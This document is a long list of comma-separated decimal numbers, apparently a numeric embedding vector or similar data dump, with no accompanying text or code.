0.00478966673836112, -0.005702177062630653, 0.0028794778045266867, -0.013407821767032146, -0.010301230475306511, 0.029573453590273857, -0.0011274574790149927, -0.002548946300521493, -0.014721836894750595, -0.028811000287532806, 0.0022792485542595387, 0.010828458704054356, 0.0005409159930422902, 0.007884091697633266, -0.007798923645168543, -0.0029788401443511248, -0.006578187458217144, -0.017731094732880592, 0.005345284007489681, -0.03020612709224224, 0.020570015534758568, -0.02436606027185917, -0.0053290617652237415, -0.006420019082725048, 0.019726451486349106, -0.0009530666284263134, 0.02438228204846382, -0.004984335508197546, -0.00035359786124899983, 0.004213770851492882, 0.014446056447923183, 0.02074846252799034, 0.02611808106303215, 0.0071824719198048115, -0.005353395361453295, -0.006691744085401297, 0.0010367133654654026, -0.005101948045194149, -0.030790135264396667, 0.024041611701250076, 0.009490109980106354, 0.024787843227386475, -0.024025389924645424, 0.011071794666349888, 0.0010002129711210728, 0.008695212192833424, 0.017357978969812393, 0.03223392739892006, -0.01176935900002718, -0.01438116654753685, -0.0009829766349866986, 0.010098450817167759, 0.0026442529633641243, 0.022208480164408684, -0.02655608579516411, 0.017893318086862564, 0.004570663906633854, -0.009319774806499481, -0.007186527829617262, 0.029265228658914566, 0.011193462647497654, 0.001569518237374723, 0.008212595246732235, 0.02300337702035904, 0.008970992639660835, -0.001112248981371522, -0.011152907274663448, 0.031455252319574356, -0.006359184626489878, 0.004041407722979784, -0.027156313881278038, 0.006030681077390909, 0.009871336631476879, -0.0009616847382858396, 0.030157459899783134, 0.006026625633239746, -0.024479616433382034, 0.009879447519779205, 0.004850500728935003, 0.013764714822173119, 0.002678725402802229, 0.0026645308826118708, 0.019969787448644638, -0.008938548155128956, -0.0018158960156142712, -0.0031370085198432207, -0.00844376441091299, 0.018801772966980934, 0.01938578113913536, 0.027221204712986946, 0.02733476087450981, -0.026848088949918747, 0.01377282664179802, 0.025842299684882164, -0.0009145383955910802, -0.007267639972269535, -0.017812207341194153, 0.0022893876302987337, 0.004542274866253138, -0.008784434758126736, 0.010609456337988377, 0.0015208509285002947, -0.013075262308120728, -0.021251358091831207, -0.026685865595936775, 0.026312749832868576, 0.005406117998063564, -0.04078314080834389, 0.0034533455036580563, -0.0035121517721563578, -0.0035851525608450174, 0.011185351759195328, 0.003639903385192156, -0.014721836894750595, 0.020943131297826767, 0.010763568803668022, 0.010179562494158745, -0.0028226994909346104, 0.018574660643935204, -0.023830721154808998, -0.004315161146223545, 0.031001025810837746, -0.007673200219869614, -0.03646797686815262, -0.0155167356133461, -0.006156404502689838, 0.00790436938405037, 0.0044043841771781445, 0.02209492214024067, 0.01460828073322773, 0.013188819400966167, 0.015849294140934944, -0.014583947136998177, 0.003556763520464301, 0.007519087288528681, -0.02642630599439144, -0.0094657763838768, -0.007993592880666256, -0.0011984305456280708, 0.023344049230217934, -0.0015857405960559845, -0.007251417264342308, 0.026004523038864136, 0.0014559613773599267, -0.01446227915585041, 0.019320890307426453, -0.0025509740225970745, 0.04380050674080849, -0.021786697208881378, 0.0034533455036580563, 0.0011578744743019342, 0.00025753077352419496, 0.0068620797246694565, -0.016100741922855377, 0.01589796133339405, -0.009749668650329113, 0.009838892146945, 0.014746170490980148, 0.0007234180811792612, 0.01672530546784401, 0.0039055452216416597, 0.003607458434998989, -0.03208792582154274, -0.02225714735686779, -0.0021514971740543842, 0.001981161767616868, -0.0020257735159248114, 0.00668363319709897, -0.011420576833188534, -0.007620477117598057, -0.012969817034900188, -0.02105668932199478, -0.010147118009626865, -0.03903111815452576, -0.014689392410218716, -0.00035233047674410045, 0.027448318898677826, 0.021705584600567818, -0.007442030590027571, 0.006541687063872814, -0.005134392995387316, 0.01350515615195036, 0.03617597371339798, -0.002206247765570879, 0.006136126816272736, 0.004550386220216751, -0.0065092421136796474, -0.02089446410536766, 0.010658123530447483, 0.007953036576509476, -0.0033722335938364267, -0.029914123937487602, -0.014137830585241318, -0.00666335504502058, 0.005556175485253334, -0.0017966319574043155, -0.004193493165075779, 0.010998793877661228, -0.0011609162902459502, 0.009068327024579048, 0.014875950291752815, -0.00011431729944888502, 0.00833020731806755, -0.022614039480686188, -0.024868955835700035, 0.023798275738954544, -0.004736943636089563, -0.004102242179214954, 0.01695241779088974, -0.011680135503411293, 0.013342932797968388, -0.0024009167682379484, 0.01901266537606716, 0.005308783613145351, 0.002893672324717045, -0.010366120375692844, 0.0039319065399467945, -0.03581908345222473, 0.006553853861987591, 0.006910746917128563, -0.02529073692858219, 0.05463707819581032, -0.025388071313500404, -0.009644222445786, -0.023571161553263664, 0.0111691290512681, 0.0009246774134226143, 0.0070243035443127155, -0.016068296507000923, 0.011485466733574867, -0.008232872933149338, -0.0014407527633011341, 0.008159872144460678, -0.016441412270069122, -0.011242130771279335, -0.0019000498577952385, -0.013537601567804813, 0.06443541496992111, -0.0019497309112921357, -0.03497551754117012, 0.014827283099293709, 0.02301960065960884, -0.00949822086840868, 0.011161018162965775, 0.0014681281754747033, -0.03465106710791588, -0.016984863206744194, -0.009920003823935986, -0.013886382803320885, -0.004388161934912205, -0.000761439383495599, 0.005414229352027178, -0.005706232972443104, -0.018185321241617203, -0.005454785656183958, -0.015508623793721199, 0.034488845616579056, 0.0003748897579498589, 0.005410173907876015, 0.002893672324717045, -0.03020612709224224, 0.0019061332568526268, -0.017147088423371315, -0.0008339332998730242, -0.011858581565320492, -0.005694066174328327, -0.007547476328909397, -0.029800567775964737, 0.003078202251344919, -0.01787709631025791, -0.02188403159379959, -0.0031775645911693573, 0.010358008556067944, 0.011006905697286129, -0.012012694962322712, -0.010317453183233738, -0.01734175719320774, 0.019888674840331078, -0.057946451008319855, 0.021851586177945137, 0.013221264816820621, -0.006221294403076172, -0.028097214177250862, -0.0030072294175624847, -0.025469183921813965, -0.026961645111441612, 0.0007310223882086575, 0.0011304991785436869, -0.008013870567083359, 0.00564134307205677, 0.0040272134356200695, 0.014827283099293709, 0.0136268250644207, -0.02748076245188713, -0.026166748255491257, 0.005430452059954405, -0.04078314080834389, -0.01176935900002718, -0.026669641956686974, 0.02845410816371441, -0.003858905751258135, 0.01876932941377163, 0.01839621365070343, 0.01839621365070343, 0.009928114712238312, -0.011144795455038548, -0.008151761256158352, -0.004960001911967993, 0.006241572555154562, 0.018331322818994522, 0.011785580776631832, -0.008395097218453884, 0.003603402990847826, 0.014429833739995956, 0.011128573678433895, -0.00037565018283203244, 0.005028947256505489, 0.02512851357460022, -0.01823398843407631, -0.009230551309883595, 0.019710227847099304, -0.008046315051615238, -0.00007914761954452842, -0.0166604146361351, -0.009335997514426708, 0.006359184626489878, 0.0030802302062511444, -0.012572367675602436, 0.00019302133296150714, -0.006006347481161356, 0.003224204061552882, -0.003964351490139961, 0.03445639833807945, -0.02869744412600994, -0.014137830585241318, 0.025842299684882164, -0.007665088865906, -0.021381136029958725, -0.011558467522263527, 0.014162164181470871, -0.0030417018570005894, 0.000008142889782902785, -0.00847620889544487, 0.01074734702706337, -0.018590882420539856, -0.01529773324728012, 0.00848432071506977, -0.004692332353442907, -0.0023015544284135103, 0.012694035656750202, -0.009936226531863213, 0.0043070497922599316, -0.024317393079400063, -0.002281276509165764, -0.00874387938529253, -0.005649454426020384, 0.026247859001159668, -0.006724189035594463, 0.006967524997889996, 0.010382342152297497, 0.022435592487454414, 0.011623356491327286, 0.01040667574852705, -0.022987155243754387, 0.054831746965646744, 0.011947805061936378, 0.00474911043420434, 0.021851586177945137, -0.01245069969445467, -0.018574660643935204, -0.028778554871678352, -0.00016780055011622608, -0.00669985543936491, -0.007725922856479883, 0.016003407537937164, 0.031228139996528625, 0.023068267852067947, 0.010317453183233738, -0.04831033945083618, -0.010609456337988377, 0.005937402136623859, -0.017649982124567032, 0.017909541726112366, -0.0003434588434174657, -0.016554970294237137, 0.011988361366093159, -0.01870443858206272, -0.0016536719631403685, -0.010609456337988377, 0.010552678257226944, -0.015159842558205128, -0.010463454760611057, 0.003224204061552882, 0.021218912675976753, 0.002141358098015189, -0.010106561705470085, 0.031293030828237534, -0.013634935952723026, -0.031682368367910385, 0.021851586177945137, -0.010512121953070164, -0.020018454641103745, -0.005316894967108965, -0.00028465260402299464, 0.01026067417114973, -0.019402002915740013, 0.025404294952750206, -0.0043638283386826515, 0.003224204061552882, -0.013910716399550438, -0.020196901634335518, 0.0008202455937862396, 0.007713756058365107, 0.011631468310952187, -0.0004894605372101068, 0.007470420096069574, 0.0034594289027154446, -0.01998600922524929, -0.01967778429389, 0.0020947186276316643, 0.008419430814683437, 0.005523730535060167, 0.0003477679274510592, 0.025615185499191284, -0.0028085047379136086, -0.01643330231308937, -0.00024954628315754235, 0.00660657649859786, -0.010228229686617851, -0.008240984752774239, 0.01525717694312334, 0.007843535393476486, 0.010893348604440689, -0.0071986946277320385, 0.009895670227706432, -0.029200337827205658, -0.006018514279276133, 0.016790194436907768, -0.016790194436907768, -0.005345284007489681, 0.008257206529378891, 0.023490050807595253, 0.007466364186257124, 0.006817467976361513, -0.002820671536028385, 0.024576950818300247, 0.0012602785136550665, 0.01150168851017952, 0.0044043841771781445, 0.0049762241542339325, 0.02232203632593155, -0.009076438844203949, 0.0032221763394773006, 0.02709142491221428, -0.00015043751045595855, -0.02323049120604992, -0.003601375035941601, -0.004526052623987198, 0.016400856897234917, -0.0111691290512681, 0.0072554731741547585, -0.002617891412228346, -0.011104240082204342, 0.006951302755624056, -0.007048637140542269, -0.020245568826794624, 0.002090663183480501, 0.010439121164381504, -0.007004025857895613, 0.007677255664020777, -0.0022792485542595387, -0.006967524997889996, -0.0021677196491509676, -0.003560818964615464, -0.004968113265931606, -0.00809498317539692, 0.02482028678059578, 0.008151761256158352, 0.004092102870345116, -0.005004613660275936, 0.0007872938294894993, 0.003297204850241542, -0.0033620945177972317, 0.019434448331594467, -0.0027517264243215322, -0.011672024615108967, -0.004221882205456495, 0.01150168851017952, -0.006160460412502289, -0.004895112477242947, 0.0011903193080797791, 0.010147118009626865, -0.007746201008558273, 0.0008891908801160753, 0.004542274866253138, 0.012799481861293316, 0.02089446410536766, -0.017374200746417046, -0.010577011853456497, 0.027837656438350677, -0.0227113738656044, -0.020164456218481064, 0.0008826004923321307, -0.008760101161897182, -0.006050959229469299, -0.01603585295379162, 0.005519675090909004, -0.01233714260160923, -0.008245039731264114, -0.009749668650329113, -0.00029910067678429186, 0.00014473430928774178, 0.004473329521715641, 0.0030660354532301426, -0.0013596407370641828, -0.006740411277860403, -0.013667380437254906, 0.027610542252659798, 0.028178326785564423, 0.009165661409497261, 0.00011013495532097295, -0.009717224165797234, -0.003725070971995592, 0.02044023759663105, -0.011850470677018166, -0.00009967910591512918, 0.006257794797420502, -0.003572985762730241, -0.00884932465851307, -0.003601375035941601, -0.010390453971922398, -0.013691714033484459, 0.005803567357361317, -0.02944367378950119, 0.013464600779116154, 0.010723013430833817, 0.009246774017810822, -0.006874246522784233, -0.0038771559484302998, 0.00333167752251029, 0.022435592487454414, -0.02566385269165039, 0.027610542252659798, 0.001658741501159966, -0.011785580776631832, -0.006870190612971783, 0.015086841769516468, 0.012815704569220543, 0.010171451605856419, 0.0065132975578308105, -0.01696864143013954, 0.003045757533982396, 0.00487888976931572, 0.009311663918197155, 0.01434061024338007, 0.029573453590273857, -0.010155228897929192, 0.008808768354356289, -0.011996472254395485, -0.0041448259726166725, -0.007089193444699049, -0.00564134307205677, 0.00580762280151248, -0.011858581565320492, -0.021089132875204086, -0.01990489661693573, -0.017130864784121513, -0.0029159781988710165, 0.007880035787820816, -0.003031563013792038, 0.0014590030768886209, -0.007364974357187748, 0.0016901723574846983, -0.0017895345808938146, -0.0028510885313153267, -0.01831510104238987, 0.0013140152441337705, -0.013724159449338913, -0.009782113134860992, 0.014705615118145943, -0.0014965173322707415, 0.00979833584278822, -0.0031370085198432207, -0.0039481292478740215, -0.0049194460734725, -0.005519675090909004, 0.025144735351204872, -0.011923471465706825, -0.00764886662364006, 0.005069503095000982, 0.004858612082898617, 0.04214582219719887, -0.030481908470392227, -0.017520202323794365, -0.008030093275010586, -0.007004025857895613, -0.009246774017810822, 0.012393921613693237, -0.0011497633531689644, -0.007600199431180954, 0.021024243906140327, 0.013010373339056969, -0.014162164181470871, 0.01899644173681736, 0.0043070497922599316, 0.0249825119972229, 0.021316247060894966, -0.0208133514970541, 0.01150980032980442, -0.006898580119013786, 0.003236370859667659, -0.0268643107265234, 0.004035324323922396, 0.005860345903784037, 0.015914184972643852, 0.0026219470892101526, -0.0054466743022203445, 0.0048140003345906734, 0.02157580479979515, 0.0009981851326301694, 0.02731853909790516, 0.0016404911875724792, -0.00480588898062706, 0.01810421049594879, 0.001330237602815032, -0.01547617930918932, 0.02967078797519207, 0.00679313438013196, 0.008281540125608444, 0.0015330177266150713, -0.021997587755322456, -0.00020100580877624452, -0.004150909371674061, 0.0012531811371445656, -0.008954770863056183, 0.0211864672601223, -0.017001086845993996, 0.017422867938876152, -0.007969259284436703, -0.015711404383182526, -0.009417109191417694, 0.0028875889256596565, -0.012369588017463684, 0.003021423937752843, 0.026750754565000534, -0.02074846252799034, 0.0016506302636116743, 0.0058644013479352, 0.017001086845993996, -0.01613318733870983, 0.024414727464318275, -0.057102885097265244, -0.0053696176037192345, 0.005710288416594267, 0.005414229352027178, -0.0003647507692221552, 0.018882885575294495, 0.007004025857895613, 0.0009926087222993374, -0.004274605307728052, -0.004347606096416712, 0.0022082754876464605, 0.013091485016047955, -0.03293149173259735, -0.004201604053378105, 0.003958268091082573, 0.00168408895842731, -0.013464600779116154, 0.02459317445755005, -0.005349339917302132, -0.009952448308467865, 0.0035263465251773596, -0.031455252319574356, -0.0028186438139528036, 0.02300337702035904, -0.004278660751879215, 0.006841801572591066, 0.023295382037758827, 0.00558456452563405, 0.012896816246211529, -0.05269038677215576, -0.006164515856653452, 0.022597817704081535, -0.02134869247674942, -0.001991300843656063, 0.002106885425746441, 0.02929767221212387, 0.002234637038782239, 0.025079846382141113, -0.01332671009004116, -0.000016650150428176858, -0.012653480283915997, -0.004375995136797428, -0.02830810658633709, -0.009279218502342701, 0.010828458704054356, -0.0017287005903199315, 0.012986039742827415, 0.005495341494679451, -0.007957092486321926, -0.002982895588502288, 0.005077614448964596, -0.00025043345522135496, 0.02225714735686779, 0.0014590030768886209, 0.022013811394572258, -0.0009515457786619663, 0.0072595286183059216, 0.01823398843407631, -0.01596285216510296, 0.009993004612624645, 0.000178319780388847, 0.012775148265063763, -0.003207981586456299, 0.002589502139016986, 0.010268785990774632, 0.0003363615251146257, 0.02785387821495533, 0.0012176947202533484, 0.017017308622598648, 0.014397389255464077, -0.011031239293515682, -0.004530108068138361, -0.0046396092511713505, 0.0030437298119068146, 0.02263026311993599, -0.025258293375372887, -0.0004248243640176952, 0.0155167356133461, -0.010439121164381504, 0.01146924402564764, -0.017130864784121513, 0.005836012307554483, -0.01139624323695898, -0.02762676402926445, -0.0040272134356200695, -0.0026868367567658424, 0.0015644486993551254, -0.02066734991967678, -0.008370763622224331, 0.022013811394572258, -0.010982572101056576, -0.0007355849375016987, 0.013837715610861778, 0.029930347576737404, 0.003550680121406913, -0.027951212599873543, 0.0023542772978544235, -0.014259498566389084, 0.0073568630032241344, -0.016068296507000923, 0.000609861221164465, -0.00592117989435792, 0.0009267051937058568, -0.004615275654941797, -0.012799481861293316, -0.01915866695344448, -0.005706232972443104, -0.01517606433480978, 0.001991300843656063, 0.01456772442907095, -0.016676638275384903, 0.0047328881919384, 0.004059658385813236, 0.025550296530127525, -0.003031563013792038, 0.015833072364330292, -0.01620618812739849, -0.020634906366467476, 0.005028947256505489, -0.02603696845471859, -0.005170893389731646, 0.0018544242484495044, 0.015776293352246284, 0.007385252043604851, 0.012685924768447876, 0.009709112346172333, -0.0035445967223495245, 0.019093776121735573, 0.012272253632545471, 0.004980280064046383, -0.011388132348656654, -0.0033296498004347086, -0.007291973568499088, -0.011388132348656654, -0.00029251034720800817, -0.011517911218106747, -0.006622799206525087, 0.002224497962743044, -0.02368471957743168, 0.0018382018897682428, -0.008021981455385685, -0.003710876451805234, 0.00027121842140331864, 0.003378316992893815, 0.017666203901171684, -0.03041701950132847, 0.003011284861713648, 0.02052134834229946, -0.00005237430377746932, -0.004043435677886009, 0.0016019630711525679, -0.0026260027661919594, -0.007669144310057163, -0.0332883857190609, 0.007989536970853806, 0.012953594326972961, 0.009903781116008759, -0.0033661501947790384, 0.014867839403450489, -0.0009272121242247522, -0.006318628787994385, 0.014600168913602829, -0.020780907943844795, -0.015857405960559845, -0.009660445153713226, -0.004282716196030378, 0.0027760600205510855, -0.008841213770210743, -0.009733445942401886, -0.009733445942401886, 0.004311105702072382, -0.03004390373826027, 0.028064770624041557, -0.03306127339601517, -0.012888705357909203, -0.01464072521775961, -0.008784434758126736, 0.03526752069592476, 0.0016567136626690626, -0.015192287042737007, 0.006797189824283123, -0.01321315299719572, 0.029654566198587418, -0.012734591960906982, -0.005580509081482887, 0.02285737544298172, -0.015508623793721199, -0.0018817995442077518, 0.018444880843162537, 0.0003515700518619269, -0.0024536396376788616, 0.0016526581021025777, 0.007892202585935593, 0.003195814788341522, -0.02542051672935486, -0.014656947925686836, -0.0016191992908716202, -0.013707936741411686, 0.03487818315625191, 0.022695152088999748, 0.011947805061936378, 0.008808768354356289, -0.0046963877975940704, -0.011680135503411293, 0.006050959229469299, 0.005422340705990791, -0.006740411277860403, 0.010139006190001965, 0.006342962384223938, 0.01604396291077137, 0.010001115500926971, -0.0026036968920379877, 0.0034371232613921165, -0.005122226197272539, 0.01077979151159525, 0.0007411613478325307, 0.006420019082725048, -0.01558973640203476, 0.007020248100161552, 0.027286093682050705, -0.0031755368690937757, 0.005892790388315916, -0.02232203632593155, -0.00030366325518116355, -0.0018382018897682428, 0.01426760945469141, -0.011534133926033974, 0.00393393449485302, 0.011371909640729427, -0.0011173185193911195, -0.0065700761042535305, -0.00004106297637918033, 0.011931582354009151, 0.00008022489055292681, 0.001866591046564281, -0.00009416602551937103, 0.010714901611208916, 0.0006169585394673049, 0.004436829127371311, -0.013351043686270714, 0.010763568803668022, -0.024868955835700035, 0.005325006321072578, -0.018963998183608055, -0.006225349847227335, -0.004740999545902014, -0.03276927024126053, -0.015873627737164497, 0.0016759777208790183, -0.02702653594315052, 0.005106003489345312, 0.01219114102423191, 0.0025590851437300444, 0.019434448331594467, 0.0012359449174255133, 0.002538807224482298, 0.00877632386982441, -0.01839621365070343, -0.007218972779810429, 0.00004071444709552452, 0.00487888976931572, 0.008313985541462898, 0.017455313354730606, 0.01249125599861145, -0.017049754038453102, -0.018866663798689842, -0.01802309788763523, 0.01565462537109852, 0.0012815704103559256, -0.004461162723600864, 0.012621034868061543, -0.016627971082925797, -0.019402002915740013, -0.011761247180402279, 0.02762676402926445, 0.0003804662264883518, 0.023490050807595253, 0.003927851095795631, -0.0006037778221070766, 0.02324671298265457, 0.0038021274376660585, 0.013075262308120728, 0.007275750860571861, -0.01650630310177803, -0.0024516116827726364, -0.017731094732880592, 0.008228817954659462, -0.002652364084497094, 0.0002556297113187611, 0.004444940481334925, -0.018882885575294495, 0.0020866075064986944, -0.0006980705657042563, -0.004907279275357723, -0.005888734944164753, -0.011663912795484066, 0.00671607768163085, 0.015078729949891567, 0.003893378423526883, 0.024495840072631836, -0.005353395361453295, 0.010512121953070164, 0.012734591960906982, 0.0004947835113853216, -0.0026300582103431225, 0.003735210048034787, -0.0166604146361351, -0.014519057236611843, 0.01769864931702614, 0.004152936860918999, 0.012296587228775024, -0.018185321241617203, 0.013999939896166325, 0.03526752069592476, 0.02112157829105854, -0.009546888060867786, 0.005239838734269142, -0.00476938858628273, -0.000861815526150167, 0.02361982874572277, -0.008147705346345901, -0.026296526193618774, 0.00003062296673306264, -0.0037311543710529804, 0.016392745077610016, 0.022143589332699776, 0.020716017112135887, 0.001562420860864222, 0.0012957650469616055, -0.015184176154434681, -0.0013211125042289495, -0.012061362154781818, 0.0000023208820039144484, -0.009790224954485893, -0.0011740969493985176, 0.001831104513257742, -0.0032809823751449585, 0.006955358199775219, 0.010098450817167759, 0.024414727464318275, -0.008808768354356289, 0.004193493165075779, 0.0111691290512681, -0.0019943425431847572, 0.02066734991967678, 0.009279218502342701, -0.00900343805551529, 0.0010818319860845804, 0.02254915051162243, -0.004866722971200943, -0.00016475885058753192, -0.026604752987623215, 0.02361982874572277, 0.0005885693244636059, 0.00166989432182163, -0.004384106490761042, 0.01597096212208271, -0.01052834466099739, 0.008322096429765224, -0.015078729949891567, 0.012231697328388691, -0.00558456452563405, 0.012028917670249939, 0.009360331110656261, 0.01641707867383957, -0.009392775595188141, -0.020683573558926582, -0.003210009541362524, -0.0046396092511713505, 0.01260481309145689, -0.017065975815057755, -0.014064829796552658, -0.0039014897774904966, -0.03307749330997467, 0.008881770074367523, 0.01574384979903698, 0.004254327155649662, 0.0006488963845185935, -0.003317483002319932, 0.009368441998958588, -0.007405530195683241, -0.01959667168557644, 0.0023684718180447817, 0.02595585584640503, 0.0007203763816505671, 0.0005097385728731751, 0.001161930151283741, 0.0052114492282271385, 0.008565432392060757, 0.016465745866298676, 0.011063683778047562, 0.01567084901034832, -0.005892790388315916, 0.023035822436213493, 0.025923412293195724, -0.014746170490980148, 0.020878242328763008, -0.00957933347672224, -0.023587385192513466, -0.0009069341467693448, -0.02566385269165039, -0.00380415515974164, 0.007880035787820816, 0.011063683778047562, -0.01717953197658062, -0.014446056447923183, -0.01990489661693573, -0.004006935283541679, -0.009603667072951794, -0.014924617484211922, 0.0016455607255920768, -0.010325564071536064, -0.0028551442082971334, 0.0049153901636600494, 0.004777499940246344, -0.008792546577751637, -0.002788226818665862, -0.005101948045194149, 0.017990652471780777, -0.008524877019226551, 0.007624533027410507, 0.007190583273768425, -0.007064859848469496, 0.006667410489171743, -0.007519087288528681, -0.009481999091804028, 0.008265318349003792, 0.019207334145903587, 0.020083343610167503, -0.015281510539352894, 0.0003832544316537678, -0.01695241779088974, -0.0012136390432715416, 0.016522524878382683, -0.0170335303992033, 0.00848432071506977, -0.013123929500579834, -0.009782113134860992, 0.007036470342427492, 0.023214269429445267, 0.001834146212786436, 0.00022533941955771297, -0.026150524616241455, -0.019856229424476624, -0.008046315051615238, -0.014389277435839176, -0.000278822670225054, 0.011907248757779598, 0.003798071760684252, 0.01245069969445467, 0.015135508961975574, -0.002956534270197153, -0.005823845509439707, -0.0041853818111121655, 0.009701001457870007, 0.0008755032322369516, -0.009806446731090546, 0.008841213770210743, 0.007583976723253727, 0.007291973568499088, 0.01800687611103058, -0.004290827549993992, -0.0049153901636600494, 0.009782113134860992, 0.0036743758246302605, -0.0056778434664011, 0.0111691290512681, -0.00688641332089901, -0.0044206068851053715, 0.012101918458938599, -0.01567895896732807, 0.0024009167682379484, 0.026815643534064293, -0.005617009475827217, -0.000024666302124387585, -0.016838861629366875, 0.014648836106061935, 0.01547617930918932, 0.001241014339029789, 0.005483174696564674, 0.0005211449461057782, 0.005085725802928209, 0.0033560111187398434, -0.013026595115661621, -0.00840320810675621, -0.006095570512115955, -0.020083343610167503, -0.000011588567758735735, -0.005600787233561277, -0.002084579784423113, -0.0023664440959692, 0.013829604722559452, -0.0008684059139341116, 0.0074176969937980175, 0.002137302653864026, 0.016100741922855377, 0.020570015534758568, -0.011493577621877193, 0.0053696176037192345, -0.009741557762026787, -0.013724159449338913, -0.005089781247079372, 0.011055572889745235, 0.003031563013792038, -0.0011609162902459502, -0.012888705357909203, 0.014105386100709438, -0.0035425687674432993, -0.007446086499840021, -0.008687100373208523, 0.000611382070928812, -0.022954709827899933, -0.003832544432953, 0.00579140055924654, 0.0032566487789154053, -0.016173742711544037, 0.005101948045194149, 0.004643665160983801, 0.02542051672935486, 0.006286183837801218, -0.009546888060867786, -0.0003518235171213746, 0.0024435005616396666, 0.005345284007489681, -0.00148029497358948, -0.0223382581025362, -0.005588620435446501, -0.005085725802928209, 0.018412435427308083, 0.020164456218481064, 0.017731094732880592, -0.028664998710155487, -0.007243306376039982, -0.002159608295187354, 0.025112291797995567, -0.013926939107477665, 0.005977957975119352, 0.0009672612068243325, -0.0016191992908716202, 0.0018148821545764804, 0.011209685355424881, 0.018039319664239883, 0.009587444365024567, -0.0020369263365864754, 0.007936813868582249, 0.00660657649859786, 0.0024718898348510265, 0.008009814657270908, 0.004002879839390516, 0.014024273492395878, 0.03057924285531044, -0.007932758890092373, -0.0039014897774904966, 0.026669641956686974, 0.02279248647391796, 0.014843505807220936, -0.007093248888850212, 0.02360360696911812, -0.0016749638598412275, -0.00859787780791521, 0.024333614856004715, -0.008549210615456104, -0.010504011064767838, -0.022046254947781563, 0.00040074423304758966, 0.011623356491327286, -0.00008934999641496688, 0.001812854316085577, -0.03291527181863785, -0.004254327155649662, -0.011055572889745235, -0.00888988096266985, -0.016903750598430634, 0.0015238926280289888, 0.0005505480221472681, -0.022808708250522614, 0.013797160238027573, -0.0012714314507320523, -0.01567084901034832, 0.027691654860973358, 0.007989536970853806, 0.0013697798131033778, -0.0005130337085574865, -0.00475316634401679, 0.007320362608879805, 0.009360331110656261, -0.004282716196030378, 0.0006200002389959991, -0.03533240780234337, 0.0015573514392599463, -0.0057224552147090435, -0.0032120372634381056, 0.006363240536302328, 0.010585122741758823, 0.0134402671828866, 0.0032485376577824354, 0.02142980322241783, -0.0011386104160919785, 0.012742702849209309, -0.01037423126399517, 0.0032444819808006287, -0.01180180348455906, -0.004493607673794031, 0.001569518237374723, -0.0013271959032863379, 0.017374200746417046, 0.008922325447201729, -0.017828429117798805, 0.016076408326625824, 0.009279218502342701, 0.01150168851017952, 0.010852792300283909, -0.009400886483490467, -0.017228199169039726, 0.005596731323748827, 0.0007234180811792612, 0.014300054870545864, -0.007145971525460482, -0.015987185761332512, -0.016838861629366875, -0.001008831080980599, -0.0177797619253397, -0.008922325447201729, 0.02285737544298172, -0.03309371694922447, 0.00020239991135895252, -0.02347382716834545, -0.004432773683220148, -0.0007558629149571061, 0.004558497108519077, 0.0017043669940903783, 0.0007462308858521283, -0.019434448331594467, -0.020456459373235703, -0.006205071695148945, 0.010479677468538284, -0.004663942847400904, 0.0001438471517758444, 0.0001637449604459107, 0.003682487178593874, 0.013002261519432068, 0.025598963722586632, -0.008058481849730015, 0.014478500932455063, 0.016773972660303116, -0.016408968716859818, -0.018817996606230736, -0.003457401180639863, 0.011477354913949966, -0.019045108929276466, -0.020245568826794624, 0.009928114712238312, 0.02574496529996395, -0.005122226197272539, 0.00847620889544487, -0.016335967928171158, -0.011777469888329506, -0.00590090174227953, -0.00590090174227953, 0.001637449488043785, 0.007235195022076368, -0.009271107614040375, 0.0005307769752107561, -0.007807034999132156, -0.011088017374277115, 0.006140182260423899, 0.02770787663757801, -0.00968477874994278, -0.016327856108546257, 0.02482028678059578, 0.003471595700830221, -0.0013900577323511243, 0.008760101161897182, 0.01756886951625347, 0.012239808216691017, 0.008654655888676643, -0.0011041377438232303, -0.005458841100335121, -0.006038792431354523, 0.0013018484460189939, 0.004708554595708847, -0.006732300389558077, 0.006022569723427296, 0.0025246127042919397, 0.015776293352246284, -0.009563110768795013, 0.003039674134925008, -0.025566518306732178, 0.004266493953764439, 0.007202750071883202, 0.00923866219818592, 0.010844681411981583, 0.010495899245142937, -0.018217766657471657, -0.011006905697286129, -0.001752020325511694, -0.07897069305181503, 0.007689422462135553, 0.0012937372084707022, -0.015930406749248505, -0.0002658954472281039, 0.0005540967104025185, -0.005653509870171547, -0.008614099584519863, 0.018525991588830948, 0.013488934375345707, 0.004193493165075779, 0.009027771651744843, -0.006022569723427296, 0.020342903211712837, -0.009133216924965382, -0.0023015544284135103, 0.019434448331594467, -0.0010706790490075946, 0.0031674255151301622, -0.0016992974560707808, -0.01831510104238987, -0.024463394656777382, -0.016303522512316704, -0.008305873721837997, 0.006837746128439903, -0.002074440708383918, 0.01252370048314333, -0.025696298107504845, 0.0015674903988838196, -0.007746201008558273, -0.014186497777700424, 0.0038305167108774185, 0.00480588898062706, 0.014178386889398098, -0.016822639852762222, -0.008760101161897182, 0.011550355702638626, -0.0003515700518619269, 0.008792546577751637, -0.007612366229295731, -0.007296029012650251, -0.0031167306005954742, 0.019791340455412865, -0.0189315527677536, 0.002051121089607477, -0.011818026192486286, -0.010998793877661228, 0.009749668650329113, 0.024025389924645424, -0.006269961595535278, 0.006042847875505686, -0.0009211287251673639, 0.013075262308120728, -0.02211114577949047, -0.0009936225833371282, 0.011704469099640846, -0.005531841889023781, -0.023944277316331863, 0.02361982874572277, -0.005965791177004576, 0.0012775148497894406, 0.017163310199975967, -0.002102829981595278, 0.001340376678854227, 0.0031674255151301622, 0.017309311777353287, -0.0136187132447958, 0.02331160381436348, 0.01618996635079384, -0.002198136644437909, 0.005775177851319313, -0.003493901574984193, 0.014673169702291489, -0.012734591960906982, -0.005053280852735043, 0.004396273288875818, -0.007308195810765028, 0.006460574921220541, 0.010422898456454277, 0.025777410715818405, -0.007117582485079765, 0.006898580119013786, -0.004907279275357723, 0.0007979397778399289, 0.0026260027661919594, 0.006071236915886402, 0.010690568014979362, 0.0008004745468497276, 0.0008182178135029972, -0.005819789599627256, -0.00482616713270545, -0.010796014219522476, -0.03929067775607109, 0.01914244331419468, 0.002445528283715248, -0.024430949240922928, -0.01990489661693573, -0.02029423601925373, -0.014656947925686836, 0.017812207341194153, 0.0018300906522199512, 0.0025083902291953564, 0.004408440086990595, 0.006858023814857006, -0.0030579243320971727, -0.004663942847400904, 0.011250241659581661, 0.004177270457148552, -0.0035770414397120476, 0.013237486593425274, -0.009522554464638233, -0.00779486820101738, -0.0115422448143363, -0.0066268546506762505, -0.006363240536302328, -0.019710227847099304, 0.004566608462482691, 0.002137302653864026, -0.03135791793465614, -0.006310517434030771, 0.009895670227706432, 0.008873658254742622, 0.0072595286183059216, 